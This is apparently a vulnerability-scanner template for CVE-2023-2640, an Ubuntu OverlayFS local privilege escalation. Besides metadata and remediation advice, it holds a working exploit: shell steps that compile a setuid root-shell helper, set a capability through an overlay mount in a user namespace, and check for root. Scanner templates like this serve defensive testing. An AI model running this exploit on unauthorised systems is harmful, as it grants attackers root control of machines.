id: CVE-2023-2640

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  impact: |
    An attacker with local access can gain elevated privileges on the affected system.
  remediation: |
    Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
  reference:
    - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
    - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
    - https://ubuntu.com/security/notices/USN-6250-1
    - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2023-2640
    cwe-id: CWE-863
    epss-score: 0.00047
    epss-percentile: 0.14754
    cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: canonical
    product: ubuntu_linux
  tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical

self-contained: true

code:
  # Step 1: record the identity of the current (unprivileged) user.
  - engine:
      - sh
      - bash
    source: |
      id

  # Step 2: build a setuid(0) helper, give it cap_setuid in the lower layer of an
  # overlay mount inside a user namespace, trigger copy-up, then run the copy.
  - engine:
      - sh
      - bash
    source: |
      cd /tmp
      echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
      gcc test.c -o test
      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"

    # Match only when the first run is not root and the second run reports root.
    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "(root)")'
          - 'contains(code_2_response, "(root)")'
        condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950